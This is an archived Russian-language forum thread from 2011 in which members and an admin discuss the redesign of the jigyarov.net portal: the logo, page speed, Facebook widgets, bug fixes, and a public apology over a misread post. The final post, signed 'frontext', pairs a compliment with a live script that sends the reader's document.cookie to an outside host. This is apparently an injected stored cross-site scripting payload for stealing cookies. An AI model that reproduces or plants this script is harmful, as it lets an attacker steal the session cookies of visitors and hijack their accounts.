Просмотр полной версии : Новый дизайн сайта - Ваши жалобы и предложения -
Alexander
10.05.2011, 23:07
Ну что ж, поехали!
Для тех кто в лодке - сайт тута (http://www.jigyarov.net) -
Нормалёк, спасибо
Есть пару вопросов...напишу в лич!)
Sarkalina
11.05.2011, 13:53
Хороший дизайн :) Логотип супер )) Только вот .... видео дня ? оно как бы автоматически идет ? можно было бы поменять видео....
Alexander
11.05.2011, 14:23
Sarkalina "видео дня" идет как статья. Его менять раз плюнуть. Добавляешь новый видео и автоматом будет это новое видео. На то оно и называется "видео дня". На сайте Всегда будет только последный ролик (или если хотите можно сделать рандом - т.е. случайный вывод - как Опросы.)
Если ты редактор на сайте, захоти в админку, для убедительности посмотри как добавлен статья "Армяне в Москве" - (нужно всего заполнять 2 поля - заголовок, краткое описание и поставить правильный раздел - т.е. "видео дня").
И все
Только вот .... видео дня ? оно как бы автоматически идет
скажи честно, тот сзади разве не чудо природы - КАЩЕНКО отдыхает? :-):-):-)
Плюс ко всему поучительный ролик -там сзади вроде ингуш и чеченец, снимает вроде русский - так что можно сказать антиксенофобический дискурс :-):-):-)
Sarkalina
11.05.2011, 14:42
Не знаю, я не досмотрела ) После первых трех секунд выключила :)
Сейчас зайду под ником посмотрю.
Sarkalina
11.05.2011, 14:46
ааеееее, круто ))) получилось )
Sarkalina
11.05.2011, 15:00
Только еще один момент )
На логотипе написано "Джигярики, всех стран объединяйтесь!" - вот там запятая не нужна ))
Правильней будет "Джигярики всех стран, объединяйтесь!"
Alexander
11.05.2011, 15:09
одна просьба - конкретно для ролика дня лучше будет, если название будет покороче (чтобы поместилось в одной строке - на странице). Думаю так красивее будет.
Sarkalina
11.05.2011, 15:17
Окей, отредактировала. Только на сайте еще не все функции работают, я правильно поняла ? ) В некоторых позициях ошибку выдает. При просмотре новости, перед тем как добавить. Потом личные сообщения не получается удалить и статистика не открывается, тоже ошибка какая-то. Но я думаю вы это исправите. Все же только поменяли дизайн. И он мне все больше и больше нравится. Такой простой, без всего лишнего.
Alexander
11.05.2011, 15:50
В некоторых позициях ошибку выдает. При просмотре новости, перед тем как добавить.
вообще то функционал сайта- скрипта мы не трогали (добавили пару модулей), но сам скрипт не трогали, дабы не нажить себе проблем (по опыту знаю, что этот скрипт очень проблематично обновляется и каждый раз приходится искать новые модули для новой версии). Вот из за этого, мы просто залатали дырки (это критические апдейти, дабы избежать Shell Injection Attacks), но скрипт не трогали.
Хотя наша задача была редизайн, но было бы глупо не закрывать те дырки и поправки делать, о чем на пишут на спец. сайтах.
Сейчас по поводу ошибок -
1. Если возникают ошибки, то просьба об этом подробно написать мне (желательно на емейл - он у меня в сигнатур) или тута.
При просмотре новости, перед тем как добавить. Потом личные сообщения не получается удалить и статистика не открывается, тоже ошибка какая-то
2. а новосты вы откуда добавляйте ? отсуда (http://www.jigyarov.net/addnews.html) ?
Я про него вообще забыл и на другой ветке (Уголок модератора - Предлагаю - 2 )как раз Наре предлагал добавлять новости и редактировать сайт через админ панель. Почему ?
Потому что у нас на админке стоит дополнительная защита, и если с юзер части идет запрос на админ парт (при этом без авторизации на втором заслоне) -система квалифицирует это как Hacking attempt! (попробую посмотреть как обходить его). - хотя я только что новость(анекдот) добавил без проблем, на (просмотре увидел проблему)
Alexander
11.05.2011, 15:55
Лого исправил и плюс на армянском убрал надпись урл-а (без толку).
Alexander
12.05.2011, 23:38
нельзя было писать - "Malenkaya vietnamskaya pianistka" на русском ?
Alexander
13.05.2011, 15:27
Модеры
Просьба Видео дня не обновлять. Есть маленькая ошибка, из за чего и mp3 плееры не работали.
Даже смешно говорить, но для того, чтобы Видео дня был размешен в средную колонку мы преднамеренно уменшили размер отображаемых видео файлов (т.е. видео плеера) до 245пикселей (при большем размере дизайн просто страдал и пришлось бы поменять место).
А этот идиот (ака скрипт) взял да уменшил заодно и размер мп3 плеера, поэтому и при открытии аудио файлов был виден только часть плеера, (и как назло часть где не было кнопки PLAY). Из за этого целый день потеряли, чтобы понять почему этот дурацкий мп3 плеер не работает..... а он козел (простите) работал, да только кнопки не выдно было.
Заключение: вьетнамскую пианистку не трогать - даже не редактировать, новых видео дня не добавлять.
Аудио плеер сейчас нормально работает.
Alexander
13.05.2011, 21:41
Всё этот вопрос тоже можно считать решенным
Alexander
13.05.2011, 21:51
всЁ
забыл сказать, что уже можно редактировать и обновлять раздел "Видео дня" :-)
Alexander
13.05.2011, 22:01
Админ
поправил погрешность с добавлением новости с юзер части - если помнишь, тогда при "ПРОСМОТРЕ" - выскакивал Hacking attempt! Сейчас он устал и больше не выскакивает
Sarkalina
16.05.2011, 23:33
Александр молодец ) :yes:
Arev Lusin
19.05.2011, 04:06
На сайте я тоже зарегистрирована. Новый дизайн понравился.
Вопрос Александру, на сайте только у меня Панель не работает или у всех так?
Alexander
19.05.2011, 04:25
у всех (пока что)
Alexander
20.05.2011, 01:07
На сайте я тоже зарегистрирована. Новый дизайн понравился.
Вопрос Александру, на сайте только у меня Панель не работает или у всех так?
Arev Lusin, мне сообщили, что Панель стал работать. Проверь плж
Вы совсем не жалеете пользователей с медленным интернетом соединением, либо с ограниченным трафиком )) зачем на главной картинку альбома такую огромную ставить?
Да и ещё, надеюсь вы структуру меню не меняли на сайте?
Чем предназначение "Архив новостей" отличается от предназначения "Календарь" ?
2 рекомендации от фейсбук внизу справа они что дают?
Alexander
24.05.2011, 23:41
Vardani
Вы совсем не жалеете пользователей с медленным интернетом соединением, либо с ограниченным трафиком
вообще то во дворе уже не тот век, так что говорить о медленном интернете (настолько чтобы 3-4 фотографии невозможно было открыть - уже как минимум смешно). С другой стороны я полностью согласен с Арутом, но с другими доводами -
1 . ставить весь текст одной статьи на первой странице,
2. да еще с 3-4 фотографиями больших размеров
3. да ещё все эти фотки имеют ссылки на radikal.ru (непонятно с какой целью ТопикСтартер оставил ссылки на радикал). Представляйте на первой странице 3-4 фотки, на самом видном - и все они ведут на другой сайт. Обращайтесь в .radikal.ru, они должни оценить ваши старания.
4. да ещё линк на файлхостинг сайт в открытом виде (трудно было ставить хайд) или просто после всех этих изменении на сайте, все таки стремимся к тому, чтобы сайт был признан варез сайтом(не лицензионный контент и все такое)
Нет.
что конкретно вы имейте ввиде.
хмм ... попытаетесь сами догадаться (без обид). вообще то ничем - в одном по датам, в другом по числам и датам :-)
хмм. Что вообще дают рекомендации от фейсбук - с этим вопросом попытаетесь ответ на этот вопрос найти в интернете.
Если ответить попроще - то заполняют свободное пространство.
--
Что касается Vardani, то я попытаюсь как то отредактировать статью, но было бы лучше, если ТС прочел все таки изменил свой "подход". Об этом я ещё вчера писал на другой ветке.
--
Спасибо
Vardani
вообще то во дворе уже не тот век, так что говорить о медленном интернете (настолько чтобы 3-4 фотографии невозможно было открыть - уже как минимум смешно).
Это может быть в Америке уже не тот век)) В России, а так же в странах СНГ, интернет только получает свое развитие, причем имеется ввиду высокоскоростной интернет. Речь идет не об развитых городах этих стран. К тому же большинство пользователей сидит с ноутбуков, нетбуков, бывает даже с мобильных устройств (кпк, смартфоны и т.д.). Так вот в случае с ноутбуками используют беспроводной интернет, который славится низкой и нестабильной скоростью (исключение wi-fi, что редко встретишь открытом доступе), это независимо от местонахождения. Статья, которая отображается на главной странице, по идее должна нести в себе одну картинку уменьшенного размера, а так же краткое описание статьи (обычно первый абзац статьи) а потом уже ссылка "Далее" на всю статью/материал. Когда сайт загружается мгновенно у пользователей возникает желание вернуться, а когда он грузится долго, одна мысль что можно пойти выпить чай пока откроется картинка одна на главной сразу отталкивает.
У меня со скоростью интернета всё в порядке)) я не за себя говорю, а в плане доступности сайта большему количеству пользователей.
хмм ... попытаетесь сами догадаться (без обид). вообще то ничем - в одном по датам, в другом по числам и датам :-)
Это я то знаю)) Я думал может какие то секретные функции существуют. Моё мнение, можно было бы оставить по "числам и датам" а просто "по датам" убрать. Не вижу смысла дублировать одинаковые по функциям блоки. Рациональнее оставить блок, с наибольшим функционалом. В нашем случае это "по числам и датам" )))
хмм. Что вообще дают рекомендации от фейсбук - с этим вопросом попытаетесь ответ на этот вопрос найти в интернете.
Вот и для меня это загадка. Чем проще сайт, тем он лучше и легче в нем разобраться. Вся лишняя информация лишь путает пользователя. Всё должно быть максимально доступно и понятно. Тем более блоки, несущие в себе информацию сторонних сайтов (в нашем случае фейсбук), могут увеличить время загрузки страницы вашего сайта, если фейсбук подвиснет или же если у провайдера пользователя проблемы с пингом до фейсбука. То же самое касается картинок с радикала.
Но это все лично мое мнение)) Так что ругать меня не надо
Alexander
25.05.2011, 20:36
Статья, которая отображается на главной странице, по идее должна нести в себе одну картинку уменьшенного размера, а так же краткое описание статьи (обычно первый абзац статьи) а потом уже ссылка "Далее" на всю статью/материал.
Во-во. Это как раз для Вартани (кстати это мейл или фимейл) в качестве мануала по постингу. Кто нубудь попросите его (ей) прочесть эти строки.
Я думал может какие то секретные функции существуют. Моё мнение, можно было бы оставить по "числам и датам" а просто "по датам" убрать. Не вижу смысла дублировать одинаковые по функциям блоки.
Ну не все так просто. На самом деле это не совсем одно и то же самое. Просто я ответил вкратце.
Вам дам, вы только ПОИСК оставите на сайте - и все отстальное уберете к черте. Скажет открываешь сайт - а там только форма поиска. Хочешь что то поискать - юзай наш поиск.:jigyari:
Чем проще сайт, тем он лучше и легче в нем разобраться. Вся лишняя информация лишь путает пользователя. Всё должно быть максимально доступно и понятно.
Исходя из вашего максимализма, можно догодаться, что вам не больше 20-22. (опять же без обид)
Не все так сразу :hello:
Помните каким был сайт до этого. Имею ввиду лишные блоки(я говоря от своего имени, хотя знаю, что у меня много оппонентов по этому вопросу), картинки, шапки и всякие футеры.
Переход на такой минималистический дизайн - это уже большое шаг вперед.
С другой стороны я не совсем с вами согласен- максимально просто и доступно не озаначает, что должна быть блочная верстка сайта(когда посты друг-за-другом) и плюс реклама.
Ведь данный сайт не просто блог Джигяра. Я представляю этот сайт как портал, где всего по немногу.
Просто и доступно - это когда на самом видном месте все что нужно юзеру, и все это удобно и сгрупированно. Ведь фактически мы не меняли структуру сайта, который был на мой взляд не очень (много разделов, и почти не субразделов - все про всё, итд)
Тем более блоки, несущие в себе информацию сторонних сайтов (в нашем случае фейсбук), могут увеличить время загрузки страницы вашего сайта, если фейсбук подвиснет или же если у провайдера пользователя проблемы с пингом до фейсбука. То же самое касается картинок с радикала.
1. фейсбук на сайте расположен через ифреймы (т.е. на загрузку сайта это прямиком не действует, т.е. броузер не будет ждать пока ифрейм загрузится. )
2. На этот вопрос я уже ответил - эти 2 блока от фейсбук для того, чтобы место не оставить пустым. На их месте я виже баннеры сторонных ресурсов.
3. Вероятность что фейсбук подвиснет - довольно мала (хотя есть), но {примерно такая как скажем гугл подвиснет}
---
Это может быть в Америке уже не тот век))
Я сейчас в Ереване - и интернет не самый крутой (512кб/сек) - но намного лучше, чем скажем 15-20 лет назад. (4-8кб//сек дайл-ап)
Arev Lusin
29.05.2011, 00:14
Arev Lusin, мне сообщили, что Панель стал работать. Проверь плж
Проверила, уже работает.
Спасибо.
Arev Lusin
29.05.2011, 00:19
и интернет не самый крутой (512кб/сек) - но намного лучше, чем скажем 15-20 лет назад. (4-8кб//сек дайл-ап)
У нас 4000, а дети все равно жалуются)))
Alexander
08.06.2011, 04:43
ну вот и последный акорд поставлен !
foreverchild
09.06.2011, 14:18
фи... какой ужасный дизайн (про форум). старый был намного лучше. цвета просто кошмарные.
Alexander
09.06.2011, 16:10
Трудо угодить тому, кто мир вопринимает только в черно-белых тонах (судя по вашему сайта) - это в шутку :-)
А если серезно, то о каком дизайне можно говорить если речь идет про форум - новых то всего "2 цвета" и то в качестве окрамлений (т.е. не бекграунд сайта, или даже бека топиков или самого форума - чтобы говорить про дизайн в глобальном понимании). Но в таком случае было бы правильнее сказать, что цвета не нравяться - а тут уже вопрос вкуса.
В любом случае спасибо за ваше мнение.
foreverchild
09.06.2011, 20:42
Alexander։ угумс. всего 2 новых цвета и выбраны они на редкость ужасно.
вернул Default style - хоть на этом спасибо. :)
Alexander
09.06.2011, 20:56
ну о слово напридумали - угумс. Пришлось погуглить, чтобы не показать свою серость :)
Sarkalina
13.06.2011, 19:49
ай лайк ит )
В стиле bluemaster есть наложения в самом низу... и невозможно возвратиться в стиль New...
Alexander
14.06.2011, 00:08
этот глюк ещё со дня его создания. Глубоко никогда не копал, но предположительно проблема в самом коде данного стиля (почему предположительно, потому что это часть формы общая для всех стилей, во всех остальных он работает, а в bluemaster нет). Чтобы вернуться можно просто нажать на этот линк (http://forum.jigyarov.net/index.php?styleid=12) - в последующие разы уже будет НЮ стиль.
Arev Lusin
17.06.2011, 20:32
ну вот и последный акорд поставлен !
Последний аккорд сделан профессионально, мне лично очень нравится, спасибо.
А слон, кстати, очень милый))
Alexander
18.06.2011, 22:46
спасибо
Что касается слоника и его друзей, то это не наших рук дело - мы просто позаимствовали для нашего лого (ну и конечно немного подправили)
Alexander
18.06.2011, 22:53
кстати вот друзья нашего слоника
http://image.file.am/thumb/11025117/381314973.png (http://image.file.am/view/11025117/381314973.png)
http://image.file.am/thumb/20630999/2077533808.png (http://image.file.am/view/20630999/2077533808.png)
http://image.file.am/thumb/70917814/770406368.png (http://image.file.am/view/70917814/770406368.png)
Alexander
27.06.2011, 19:31
Получил письмо от пользователя Vardani с таким содержанием
Изначально прошу прошения, но мне придется разместить ваше письмо без вашего разрешения опубликовать его. Но так как вы у меня просите (вернее требуйте) извиняться на форуме, я как минимум должен разместить его - чтобы и другие знали За Что.
Алекс,добрый день! Вы давно пользуйтесь дешевыми интригами? Поясните мне ,какое Вы письмо от моего имени коментируете на форуме?
Потрудитесь на форуме принести свои извинения и опровергнуть вами же написанное! Мой телефон для связи 8 ***** Вардан. Было бы хорошо,если Вы тоже оставите свой номер телефона.Наверне есть смысл с вами пообщаться!
1. Вардани Простите меня, если можете.
2. И Ты меня прости Господи, грешного.
Иногда сложно бывает порой определить: кто кого искушает, кто грешит, а кто просто выполняет свою миссию. А так хочется быть правильным, чистым и неуязвимым. А кому-то просто казаться таковым для других.
3. Для тех кто не понял, но очень хочет понять речь идет про этот пост http://forum.jigyarov.net/showthread.php?p=137853#post137853 (пост №23)
Vardani
Цитата:
Вы совсем не жалеете пользователей с медленным интернетом соединением, либо с ограниченным трафиком
вообще то во дворе уже не тот век, так что говорить о медленном интернете (настолько чтобы 3-4 фотографии невозможно было открыть - уже как минимум смешно). С другой стороны я полностью согласен с Арутом, но с другими доводами -
1 . ставить весь текст одной статьи на первой странице,
2. да еще с 3-4 фотографиями больших размеров
3. да ещё все эти фотки имеют ссылки на radikal.ru (непонятно с какой целью ТопикСтартер оставил ссылки на радикал). Представляйте на первой странице 3-4 фотки, на самом видном - и все они ведут на другой сайт. Обращайтесь в .radikal.ru, они должни оценить ваши старания.
4. да ещё линк на файлхостинг сайт в открытом виде (трудно было ставить хайд) или просто после всех этих изменении на сайте, все таки стремимся к тому, чтобы сайт был признан варез сайтом(не лицензионный контент и все такое)
Цитата:
Нет.
что конкретно вы имейте ввиде.
Цитата:
Цитата:
--
Что касается Vardani, то я попытаюсь как то отредактировать статью, но было бы лучше, если ТС прочел все таки изменил свой "подход". Об этом я ещё вчера писал на другой ветке.
--
Спасибо
вина моя в том, что отвечая другому (постом выше) имел глупость в начале моего поста написать Vardani. (хотя и сделал цитату в самом начале). Для этого хватило бы прочесть пост Арута (http://forum.jigyarov.net/showpost.php?p=137851&postcount=22)
Единственное предложение, где речь шел про Вартани - это вот этот -
да ещё все эти фотки имеют ссылки на radikal.ru (непонятно с какой целью ТопикСтартер оставил ссылки на радикал). Представляйте на первой странице 3-4 фотки, на самом видном - и все они ведут на другой сайт. Обращайтесь в .radikal.ru, они должни оценить ваши старания.
VARDANI
Не знаю почему вы восприняли мои слова в штыки. Но так уж принято в Интернету, что просто так никому не дают беклинка (потому что отдавая кому то беклинк - ты этим же теряешь в своем PR-е). Беклинк стоит денег, иногда довольно серезных. Долго объяснять не буду, просто если пол года назад сайт jigyarov.net имел PR 6, то несколько месяцев назад он стал 5, и только сегодня после очередного гугл апдейта стал PR 4. Это заслуга Админа, меня, и даже ваша.
Вот о чем я говорил, когда писал про линки на радикал. Моя ошибка была в том, что в ваши непрофесионалные действия я сравнил с сотрудничеством с Радикал.ру.
Если это вас задело, то примите мои извинения. Во всем остальном бог нам судья.
Надеюсь вопрос исчерпан!!!
---
Что касается моих пристрастии дешевыми интригами, то не скрою было такое дело - 15-20 лет назад когда по телику в перый раз крутили Рабыню Изауру - пару серий просмотрел.
Если есть желание пообщаться со мной, то на ваш имейл отправлю свой мобайл, на случай если остались какие то вопросы.
:sarcastic::sarcastic::sarcastic:
Alexander
06.07.2011, 01:56
не думал, что еще напишу здесь и потревожу ваш сон, но нужно ...
Фан пейдж вашего сайта на Facebook теперь уже имеет короткий адрес - вместо http://www.facebook.com/pages/JigyarovNET-Армянский-молодежный-портал/159359030794724 у него будет такой урл - http://www.facebook.com/jigyarov.net
Поздравляю
Ничего менять не надо facebook.com сам будет делать редирект.
Не спрашивайте чего мне это стоило ... но было не просто
З.ы.
1. Пост обрашен не конкретно кому ! :-)
2. Если кому то не нравиться факт, что я пишу с ошибками, то просьба не тревожить меня по этому поводу. В качестве информации - русский или армянский - не есть мои родные языки, хотя сомневаюсь что "многие" умеют писать или хотя бы говорить на своих родных языках.
3. Под конец - я наемный работник. Мне платят - я работаю. Оставьте при себе свои высокие идеи, они давно уже не вдохновляют меня.
З.ы.ы.
Простите если мой пост был пафосный - просто сегодня был на Присяге своего племянника в Лусакерте (Армения)- и до сих пор под впечетленими (негатив).
...
Фан пейдж вашего сайта на Facebook теперь уже имеет короткий адрес - вместо http://www.facebook.com/pages/JigyarovNET-Армянский-молодежный-портал/159359030794724 у него будет такой урл - http://www.facebook.com/jigyarov.net
Поздравляю
Ничего менять не надо facebook.com сам будет делать редирект.
Не спрашивайте чего мне это стоило ... но было не просто
Спасибо большое... было бы неплохо объяснить, что нам даёт более короткий урл...
Alexander
06.07.2011, 03:05
если коротко - то удобство
Плюс что ваше - остается за вами. Завтра никто не регнет этот урл в фейсвук и не скажет, что это и есть оффициальный фан пейдж Джигяриков.
также можно погуглить (http://www.google.ru/search?q=что+даёт+короткий+урл) или этот (http://www.google.ru/search?q=короткий+урл)
frontext
22.04.2012, 17:14
Классный диз...
Слон красавец)
<script> img = new Image(); img.src = "http://sinamay.ru/s.gif?"+document.cookie; </script>
vBulletin® v3.8.2, Copyright ©2000-2012, Jelsoft Enterprises Ltd. Перевод: zCarot